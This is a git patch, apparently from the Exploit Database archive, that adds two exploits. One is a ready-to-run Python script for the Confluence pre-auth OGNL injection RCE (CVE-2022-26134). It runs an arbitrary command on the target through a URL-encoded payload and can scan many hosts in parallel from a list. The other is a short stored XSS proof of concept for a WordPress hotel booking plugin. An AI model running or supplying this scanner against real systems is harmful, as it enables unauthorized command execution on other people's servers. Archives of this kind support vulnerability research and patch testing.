From 5012842b97f4317dde2bc3ae2ebdbf6099607071 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 11 Jun 2022 05:01:58 +0000 Subject: [PATCH] DB: 2022-06-11 2 changes to exploits/shellcodes WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) Confluence Data Center 7.18.0 - Remote Code Execution (RCE) --- exploits/java/webapps/50952.py | 110 +++++++++++++++++++++++++++++++++ exploits/php/webapps/50951.txt | 17 +++++ files_exploits.csv | 2 + 3 files changed, 129 insertions(+) create mode 100755 exploits/java/webapps/50952.py create mode 100644 exploits/php/webapps/50951.txt diff --git a/exploits/java/webapps/50952.py b/exploits/java/webapps/50952.py new file mode 100755 index 000000000..92f57b540 --- /dev/null +++ b/exploits/java/webapps/50952.py @@ -0,0 +1,110 @@ +# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE) +# Google Dork: N/A +# Date: 06/006/2022 +# Exploit Author: h3v0x +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/confluence/download-archives +# Version: All < 7.4.17 versions before 7.18.1 +# Tested on: - +# CVE : CVE-2022-26134 +# https://github.com/h3v0x/CVE-2022-26134 + +#!/usr/bin/python3 + +import sys +import requests +import optparse +import multiprocessing + +from requests.packages import urllib3 +from requests.exceptions import MissingSchema, InvalidURL +urllib3.disable_warnings() + +requestEngine = multiprocessing.Manager() +session = requests.Session() + +global paramResults +paramResults = requestEngine.list() +globals().update(locals()) + +def spiderXpl(url): + globals().update(locals()) + if not url.startswith('http'): + url='http://'+url + + headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", + "Connection": "close", + "Accept-Encoding": "gzip, deflate"} + + try: + response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) + if(response.status_code == 302): + print('Found: '+url+' // '+ response.headers['X-Cmd-Response']) + + inputBuffer = str(response.headers['X-Cmd-Response']) + paramResults.append('Vulnerable application found:'+url+'\n''Command result:'+inputBuffer+'\n') + else: + pass + + except requests.exceptions.ConnectionError: + print('[x] Failed to Connect: '+url) + pass + except multiprocessing.log_to_stderr: + pass + except KeyboardInterrupt: + print('[!] Stoping exploit...') + exit(0) + except (MissingSchema, InvalidURL): + pass + + +def banner(): + print('[-] CVE-2022-26134') + print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \n') + + +def main(): + banner() + + globals().update(locals()) + + sys.setrecursionlimit(100000) + + if not optionsOpt.filehosts: + url = optionsOpt.url + spiderXpl(url) + else: + f = open(optionsOpt.filehosts) + urls = map(str.strip, f.readlines()) + + multiReq = multiprocessing.Pool(optionsOpt.threads_set) + try: + multiReq.map(spiderXpl, urls) + multiReq.close() + multiReq.join() + except UnboundLocalError: + pass + except KeyboardInterrupt: + exit(0) + + + if optionsOpt.output: + print("\n[!] Saving the output result in: %s" % optionsOpt.output) + + with open(optionsOpt.output, "w") as f: + for result in paramResults: + f.write("%s\n" % result) + f.close() + +if __name__ == "__main__": + parser = optparse.OptionParser() + + parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)') + parser.add_option('-f', '--file', dest="filehosts", help='example.txt') + parser.add_option('-t', '--threads', dest="threads_set", type=int,default=10) + parser.add_option('-m', '--maxtimeout', dest="timeout", type=int,default=8) + parser.add_option('-o', '--output', dest="output", type=str, default='exploit_result.txt') + parser.add_option('-c', '--cmd', dest="command", type=str, default='id') + optionsOpt, args = parser.parse_args() + + main() \ No newline at end of file diff --git a/exploits/php/webapps/50951.txt b/exploits/php/webapps/50951.txt new file mode 100644 index 000000000..e8cf3cff8 --- /dev/null +++ b/exploits/php/webapps/50951.txt @@ -0,0 +1,17 @@ +# Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS) +# Date: 2022-06-05 +# Exploit Author: Sanjay Singh +# Vendor Homepage: https://motopress.com/ +# Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip +# Version: 4.2.4 +# Tested on: Windows/XAMPP +########################################################################### +PoC: + +1. http://localhost/wp-admin/edit.php?post_type=mphb_room_type +2. Click on "Add Accommodation Type". +3. Add title payload= "> +4. Excerpt input payload "> +5. Click publish. +6. Visit http://localhost/accommodations/ +7. XSS payload execute. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 43763f8c4..8585cecdc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -45013,3 +45013,5 @@ id,file,description,date,author,type,platform,port 50944,exploits/php/webapps/50944.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)",1970-01-01,RedHatAugust,webapps,php, 50945,exploits/php/webapps/50945.tzt,"Contao 4.13.2 - Cross-Site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php, 50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php, +50951,exploits/php/webapps/50951.txt,"WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Sanjay Singh",webapps,php, +50952,exploits/java/webapps/50952.py,"Confluence Data Center 7.18.0 - Remote Code Execution (RCE)",1970-01-01,"Fellipe Oliveira",webapps,java,